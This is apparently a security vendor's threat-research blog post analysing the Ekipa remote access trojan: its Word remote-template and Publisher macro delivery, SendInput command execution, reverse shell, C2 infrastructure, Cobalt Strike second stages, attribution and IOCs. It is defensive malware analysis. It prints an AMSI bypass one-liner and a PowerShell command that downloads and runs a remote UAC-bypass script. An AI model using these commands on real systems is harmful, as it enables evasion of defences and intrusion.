Malicious Macros Adapt to Use Microsoft Publisher to Push Ekipa RAT

After Microsoft announced this year that macros from the Internet will be blocked by default in Office, many threat actors have switched to different file types such as Windows Shortcut (LNK), ISO or ZIP files, to distribute their malware. Nevertheless, Office documents are still actively leveraged in many campaigns and pose a large risk to organizations, especially with threat actors continuously finding new ways to avoid detection.

The Trustwave SpiderLabs’ Research Team has analyzed samples of an Ekipa Remote Access Trojan (RAT) in the wild, and found interesting techniques for the use of malicious Office documents. As shown in this research, the Ekipa RAT was added to a sophisticated threat actors’ cyber arsenal and used in the Russian – Ukraine war. 

Overview of Functionalities

Ekipa is a Remote Access Trojan used for targeted attacks and can be purchased  on underground forums, as CloudSEK found in its research. The current price is set at $3,900, which is very high. The trojan leverages MS Office and Visual Basic for Applications as its main infection and operations vector. It also comes with a control panel and builders for:

• MS Word Macros
• XLL Excel add-ins
• MS Publisher Macros

A Remote Access Trojan is capable of:

• Collecting information about a targeted system (basic system information, installed AV products, GPU and CPU information and more)
• Browsing and downloading of files on attached drives
• Dropping files
• Executing files and commands.

When used with malicious Word documents, the trojan’s main functions are implemented in a one-time VBA macro template. When the document is reopened, the server rejects the request to download the macro template and all subsequent requests for installation actions.

Figure 1:  Ekipa RAT advertisement on the XSS forum

Figure 2: Ekipa RAT is continuously updated with new features as seen in presented screenshot from the XSS forum.

Analysis of Microsoft Word Documents with Remote Template

There are multiple documents related to Ekipa RAT on popular malware analysis sites, but since the Command and Control (C2) server rejects the subsequent requests for the remote template, there are only a few available for analysis. Malwarebytes analyzed an early version of the template in July 2021 and a few samples were discovered by other researchers and posted on Twitter. The comprehensive list of samples identified by Trustwave is presented in the IOC section of this blog. In the following paragraphs we analyzed the Microsoft Word remote templates:

• 4ee626e058e7be9e5d20f314895500c5abf34c61a15a3b9b4f90c04f88c26aad
• E5a302c3d53851be4e09585f7462346a6f7a71b02bf38d8483f5c48e2ab845c7

Execution

The initial Microsoft Word document “Приказ №21 от 29-03-2022.docx” was observed in March 2022. Upon execution, it downloads the remote template from the URL:

hxxps[.]//roskazna[.]net/acpx/t.php?t=774b4bcb8d7287d011ac9cb2d7ff2a76659ca82a46e5df7783c9ff011d19b21e17393264b85072391adc0b57f0abea9e&action=show_document&z=1&x=2500.

This URL pattern matches URLs seen in other documents related to Ekipa RAT. They contact ‘t.php’ endpoint with parameter "t" which is the unique identifier ensuring that the remote template can be fetched only once for any given initial Word document file, and parameter “action” with “show_document” value.

The remote template executes the VBA RAT after the user decides to close the document. In the DocumentBeforeClose procedure, it cancels shutdown of the document and instead sets the Application.Visible property to False. Then it executes the main ConnectCP function.

Figure 3: DocumentBeforeClose procedure in analyzed template

Main Functionalities

In the ConnectCP routine, the malicious macro collects information about the system and stores it in a JSON format. Next, it leverages SetTimer to set up a procedure (“TimerProc”) that will execute every 2.5 seconds. The time interval value is the ‘x’ parameter in the initial URL fetching the remote template.

The timer procedure executes the function responsible for sending the initially collected data about the system to the Command-and-Control server. In response the server returns a list of tasks for the trojan to execute.

Figure 4: System information collection and exfiltration.

The RAT has nine different tasks that it can implement. These are similar to what Malwarebytes observed in its research, notably that the shellcode execution feature is missing. An interesting technique used to implement the exaction of a command is described in the following section.

Figure 5: Tasks implemented in the VBA RAT

Commands Execution via SendInput

One of the analyzed malware capabilities is the execution of commands provided by the Command-and-Control server. For that purpose, threat actors use a technique leveraging SendInput function from USER32.DLL.

Figure 6: Beautified VBA code executing commands leveraging SendInput function.

Malicious VBA Macro synthesizes keyboard input to open ‘Run’ window and execute malicious commands. This way it evades the Parent-Child process relationships. As shown in the example below, leveraging this technique to run cmd.exe, titled ‘CMDSendInput’, opens a new console window with the explorer.exe as a parent process and not winword.exe as for the cmd.exe, titled “CMDCallShell” opened via classic “Call” and “Shell” Visual Basic functions.

Figure 7: Example Run Window Starting Command Prompt

Figure 8: Process tree with executed Command Prompts

This is significant as the Parent-Child process relationships are often the basis for detection of malicious activity by security products.

e5a302c3d53851be4e09585f7462346a6f7a71b02bf38d8483f5c48e2ab845c7

Based on Creation Date analysis, this template is a later version of Ekipa RAT. As per this timestamp it was created on August 7, 2022, but it was observed in the wild around December 12, 2022. Multiple documents were submitted to Virustotal fetching this remote template, suggesting a wider campaign. All used a lure targeting Russian recipients.

Figure 9: Lure used in document OPRF.docx

URLs fetching the remote template share the same pattern as with other C2 servers. Here is an example of the link:

hxxps://ekb[.]tanzedrom[.]ru/secure-document/t.php?t=67b81a557d8dbe296942c0efdc0030f01f03933b9ea815975089e1f8c06db9c521f7ef9b70ad25db8f8483cbbb2fb813&action=show_document&z=OPRFTHRD&x=5000

Functionalities of the VBA RAT in the remote template are similar to those in an earlier version analyzed in previous paragraphs. Notably, there is a new task that can be executed by the RAT which is a reverse shell. More detail on Reverse Shell Creation is presented in the next section.

Reverse Shell Creation

A new task with Task ID ‘~’ is responsible for creating a reverse shell for the attacker. It creates a ‘cmd.exe’ process with a modified StartupInfoA structure so that standard input and output is routed through two created pipes. One of them is used to send commands to Command Prompt and the second one to read the output.

Figure 10: Reverse Shell Creation implementation of Ekipa RAT

Use of Ekipa RAT In The Wild

The most recent Ekipa RAT Command and Control server identified by SpiderLabs is domain ekb[.]tanzedrom[.]ru. This C2 server quickly became inactive, and we were unable to interact with it. However, during our research we were able to communicate with the other identified C2 server, domain azure-tech[.]pro.

The server did not respond to requests fetching the remote template, but after analysis of the template observed in earlier infections and described in the previous section, we were able to interact with the server and acquire a list of tasks that were supposed to execute on an infected machine. What’s interesting is that the C2 server appeared to be geo-fenced to only allow traffic from Ukraine. Fetched tasks included the download of second stage payloads from another server and execution of two files.

Figure 11: Infection flow of a sample communicating with one of the analyzed C2 servers.

The second-stage server, 146.70.87[.]218, was not active at the time of the analysis, however pivoting on this IP address and URL pattern we found additional IP addresses, that we assess with high confidence to be part of the same malicious infrastructure.

Figure 12: Identified malicious infrastructure and its similarities

Security Researcher @1LuminateTheNet shared directory listing 146.70.87[.]148 on Twitter. We found similar batch scripts on active server 185.246.220[.]149.

Figure 13: Directory Listing identified on one of the servers.

All batch scripts share similar patterns. {FILENAME}.bat is an encoded Powershell command. An example of which is presented in Figure 14.

Figure 14: Example encoded PowerShell command.

The decoded command consists of two parts:

1. Obfuscated AMSI bypass oneliner:

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

2. Execution of commands fetched from /load/{FILENAME} URI

Figure 15: Example decoded powerDEF.bat script.

Analysis of powerDEF.bat

Script powerDEF.bat executes a list of commands tampered with the Microsoft Defender settings presented in Figure 16.

Figure 16: List of commands tempering with Microsoft Defender settings.

Analysis of uac.bat

Script uac.bat executes 1.bat script leveraging User Account Control Bypass from GitHub: 

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')UACBypass -noninteractive -command "C:\windows\system32\1.bat" -technique DiskCleanup

Analysis of 1.bat, 2.bat and 4.bat

Script 1.bat downloads and executes payload from http[:]//185.246.220[.]149:10443/work6, which is a PowerShell Cobalt Strike Beacon loader.

Figure 17: Example PowerShell Cobalt Strike Beacon loader

Configuration of the Beacon can be extracted using one of the scripts available on GitHub.

Figure 18: Cobalt Strike configuration extracted from one of the Beacons

Scripts 2.bat and 4.bat work analogically to 1.bat, they differ in the URL to fetch the Beacon PowerShell loader and Cobalt Strike Team Server IP address in the configuration.

Attribution

All Cobalt Strike configurations shared the same watermark (206546002), which TrendMicro researchers tied to the Play and Quantum ransomware groups. Cobalt Strike beacons with this watermark were dropped by Emotet and SVCReady botnets.

The Ekipa RAT is also being used in the Russian -Ukraine Conflict. While the analyzed Command and Control server azure-tech[.]pro seemed to be geo-fenced to only allow traffic from Ukraine, other documents were used in attacks against Russia. Documents communicating with kc-3[.]ru and roskazna[.]net domains used lures targeting Russian recipients.

Figure 19: Lure used in document “Приказ №21 от 29-03-2022.docx” impersonating Federal Treasury of Russia

The Institute of Natural and Technical Systems is a Russian entity being sanctioned by the Ukrainian government. In one of their publications called “List of measures to improve the security of the organization's IT infrastructure from the Ministry of Education and Science” (translation by Trustwave), they mention the roskazna[.]net domain and document with the same filename as presented above and attribute it as part of the campaign against the Russian Federation.

Figure 20: Part of the article published by Institute of Natural and Technical Systems

Trustwave identified two emails, with the aforementioned document as a malicious attachment, targeting major governmental and financial institutions in the Russian Federation. The first email was addressed to the Federal Customs Service of Russia, the second was addressed to one of the Gazprom Russia departments – main Russian natural resources extractor.

Figure 21: Emails with malicious attachment targeting the Federal Customs Service of Russia and Gazprom Russia

As shown in this research, the Ekipa RAT is actively being used to target Russian entities and individuals, which is in line with the Malwarebytes research.

Given that one of the servers appeared to be geofenced to only allow traffic from Ukraine, there is a small chance that it was used by two sides of this conflict.

It is interesting that while being sold on pro-Russian forums, Ekipa RAT is leveraged to target entities in Russia, which breaks the unwritten rule of this country’s hacker underground – don’t hack Russia.

Microsoft Publisher and XLL variants of Ekipa RAT

We did not identify samples of those EKIPA RAT variants in the wild. The IOC section includes one Excel document with embedded macros that, based on the included URL pattern, is an Ekipa RAT loader, however the C2 server was inactive during our analysis.

Both XLL Excel add ins and Publisher variants are most likely a response to Microsoft blocking macros in files downloaded from Internet. While XLL files are widely used by threat actors, Microsoft Publisher (.pub) files are a niche.

Just as with other Microsoft office products, like Excel or Word, Publisher files can contain macros that will execute upon the opening or closing the file, which makes them interesting initial attack vectors from the threat actor’s point of view. When Microsoft blocked macros from executing in files downloaded from the Internet, it did not do so for the Publisher files.

Figure 22: Part of Microsoft’s documentation at https://learn.microsoft.com/en-us/deployoffice/security/internet-macros-blocked

The user is presented with the warning but is still one click away from executing the malicious file and possibly infecting a machine. So far, Trustwave has not observed an uptick in malicious Publisher email attachments. Nevertheless, Trustwave SpiderLabs is monitoring the situation.

Figure 23: Security Notice displayed when user tries to run Publisher file with Macros downloaded from the internet

Conclusion

The Ekipa RAT is a great example of that how threat actors are continuously changing their techniques to stay ahead of the defenders. As shown in this research, the creators of this malware are tracking changes in the security industry, like blocking macros from the internet by Microsoft, and shifting their tactics accordingly. It is also interesting to see how sophisticated threat actors adopt these new tools into their arsenal for a better chance of completing their objectives.

Trustwave SpiderLabs would like to thank the team members who contributed supplemental findings in support of this blog.

IOCs

Initial Microsoft Word Documents

Microsoft Word Remote Templates

4ee626e058e7be9e5d20f314895500c5abf34c61a15a3b9b4f90c04f88c26aad

e5a302c3d53851be4e09585f7462346a6f7a71b02bf38d8483f5c48e2ab845c7

Initial Microsoft Excel Document

In the Wild Use